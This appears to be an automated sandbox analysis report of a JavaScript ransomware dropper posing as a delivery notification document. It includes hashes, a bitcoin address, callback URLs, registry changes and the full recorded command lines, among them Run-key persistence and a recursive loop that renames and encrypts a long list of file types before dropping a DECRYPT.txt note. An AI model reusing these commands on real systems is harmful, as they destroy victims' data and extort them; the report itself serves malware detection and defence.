Analysis
-
max time kernel
146s -
max time network
148s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
15-01-2021 15:50
Static task
static1
Behavioral task
behavioral1
Sample
Delivery_Notification_00896328.doc.js
Resource
win7v20201028
Behavioral task
behavioral2
Sample
Delivery_Notification_00896328.doc.js
Resource
win10v20201028
General
-
Target
Delivery_Notification_00896328.doc.js
-
Size
248KB
-
MD5
0168089428c6aa371f4275d0872b0970
-
SHA1
d2595c0a40c4d8dcf9f7c711f472abc6ac0f592e
-
SHA256
dc20c80a0c1db5848ceef6714c6d774f3002a0c595638aff0410ae2ddabb710a
-
SHA512
915d7a3f63429a27dace53418d8b3216ef3b4b6ac82d63ecca6f1590aa7380449fb4fe3ec8eed5a9aa3a8dadeed5ef32091ecdf2e885aca8d998d8150d07f418
Malware Config
Extracted
C:\Users\Admin\AppData\Local\Temp\a.txt
19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ
http://ferroli-lietuva.eu/counter/?a=19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ
http://georgina-collier.com/counter/?a=19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ
http://firstshow.info/counter/?a=19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ
http://gayathri.co.in/counter/?a=19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ
http://jackroubaud.com/counter/?a=19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ
Signatures
-
Blocklisted process makes network request 7 IoCs
Processes:
wscript.exeflow pid process 7 748 wscript.exe 8 748 wscript.exe 10 748 wscript.exe 12 748 wscript.exe 14 748 wscript.exe 15 748 wscript.exe 17 748 wscript.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\Run\Crypted = "C:\\Users\\Admin\\AppData\\Local\\Temp\\a.txt" reg.exe -
Modifies registry class 7 IoCs
Processes:
reg.exereg.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.crypted reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.crypted\ = "Crypted" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Crypted\shell\open\command reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Crypted reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Crypted\shell reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Crypted\shell\open reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Crypted\shell\open\command\ = "notepad.exe \"C:\\Users\\Admin\\AppData\\Local\\Temp\\a.txt\"" reg.exe -
Processes:
wscript.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 wscript.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 wscript.exe -
Suspicious use of WriteProcessMemory 27 IoCs
Processes:
wscript.execmd.execmd.execmd.exedescription pid process target process PID 748 wrote to memory of 540 748 wscript.exe cmd.exe PID 748 wrote to memory of 540 748 wscript.exe cmd.exe PID 748 wrote to memory of 540 748 wscript.exe cmd.exe PID 748 wrote to memory of 328 748 wscript.exe cmd.exe PID 748 wrote to memory of 328 748 wscript.exe cmd.exe PID 748 wrote to memory of 328 748 wscript.exe cmd.exe PID 748 wrote to memory of 1064 748 wscript.exe cmd.exe PID 748 wrote to memory of 1064 748 wscript.exe cmd.exe PID 748 wrote to memory of 1064 748 wscript.exe cmd.exe PID 748 wrote to memory of 1032 748 wscript.exe cmd.exe PID 748 wrote to memory of 1032 748 wscript.exe cmd.exe PID 748 wrote to memory of 1032 748 wscript.exe cmd.exe PID 748 wrote to memory of 576 748 wscript.exe cmd.exe PID 748 wrote to memory of 576 748 wscript.exe cmd.exe PID 748 wrote to memory of 576 748 wscript.exe cmd.exe PID 328 wrote to memory of 1228 328 cmd.exe reg.exe PID 328 wrote to memory of 1228 328 cmd.exe reg.exe PID 328 wrote to memory of 1228 328 cmd.exe reg.exe PID 1064 wrote to memory of 1624 1064 cmd.exe reg.exe PID 1064 wrote to memory of 1624 1064 cmd.exe reg.exe PID 1064 wrote to memory of 1624 1064 cmd.exe reg.exe PID 748 wrote to memory of 684 748 wscript.exe cmd.exe PID 748 wrote to memory of 684 748 wscript.exe cmd.exe PID 748 wrote to memory of 684 748 wscript.exe cmd.exe PID 540 wrote to memory of 432 540 cmd.exe reg.exe PID 540 wrote to memory of 432 540 cmd.exe reg.exe PID 540 wrote to memory of 432 540 cmd.exe reg.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\Delivery_Notification_00896328.doc.js1⤵
- Blocklisted process makes network request
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Crypted" /t REG_SZ /F /D "C:\Users\Admin\AppData\Local\Temp\a.txt"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Crypted" /t REG_SZ /F /D "C:\Users\Admin\AppData\Local\Temp\a.txt"3⤵
- Adds Run key to start application
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c REG ADD "HKCR\.crypted" /ve /t REG_SZ /F /D "Crypted"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeREG ADD "HKCR\.crypted" /ve /t REG_SZ /F /D "Crypted"3⤵
- Modifies registry class
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c REG ADD "HKCR\Crypted\shell\open\command" /ve /t REG_SZ /F /D "notepad.exe \"C:\Users\Admin\AppData\Local\Temp\a.txt\""2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeREG ADD "HKCR\Crypted\shell\open\command" /ve /t REG_SZ /F /D "notepad.exe \"C:\Users\Admin\AppData\Local\Temp\a.txt\""3⤵
- Modifies registry class
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\a.txt" "C:\Users\Admin\AppData\Roaming\Desktop\DECRYPT.txt"2⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c for /r "C:\" %i in (*.zip *.rar *.r00 *.r01 *.r02 *.r03 *.7z *.tar *.gz *.gzip *.arc *.arj *.bz *.bz2 *.bza *.bzip *.bzip2 *.ice *.xls *.xlsx *.doc *.docx *.pdf *.djvu *.fb2 *.rtf *.ppt *.pptx *.pps *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.class *.py *.pl *.h *.vb *.vcproj *.vbproj *.java *.bak *.backup *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.sql *.psd *.eps *.cdr *.cpt *.indd *.dwg *.ai *.svg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.jpeg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.mov *.3gp *.flv *.mkv *.vob *.rm *.mp3 *.wav *.asf *.wma *.m3u *.midi *.ogg *.mid *.vdi *.vmdk *.vhd *.dsk *.img *.iso) do (REN "%i" "%~nxi.crypted" & call C:\Users\Admin\AppData\Local\Temp\a0.exe "%i.crypted" k6cdgj99hsftmhewo48hy6twl4xp299iukus)2⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\a.txt" "C:\Users\Admin\Desktop\DECRYPT.txt"2⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\a.txtMD5
512ad548377714262b373c665f17d1db
SHA10f05efd559b90eb77418c32fa86cfcba77b6e187
SHA25627966b12ff9831318138b9cf663fd8e25e9469c347fe630a2c6a491bf125e2ca
SHA512f0e7456eccd513a3b09ffe1411ba661716d37efeff6cdd06b00e7859c935655a0eb5e0d75deef9f56985ff360f41e61b8f2eefa819d0677c8aa72cfb2a788943
-
memory/328-4-0x0000000000000000-mapping.dmp
-
memory/432-11-0x0000000000000000-mapping.dmp
-
memory/540-3-0x0000000000000000-mapping.dmp
-
memory/576-7-0x0000000000000000-mapping.dmp
-
memory/684-10-0x0000000000000000-mapping.dmp
-
memory/1032-6-0x0000000000000000-mapping.dmp
-
memory/1064-5-0x0000000000000000-mapping.dmp
-
memory/1228-8-0x0000000000000000-mapping.dmp
-
memory/1436-2-0x000007FEF6350000-0x000007FEF65CA000-memory.dmpFilesize
2.5MB
-
memory/1624-9-0x0000000000000000-mapping.dmp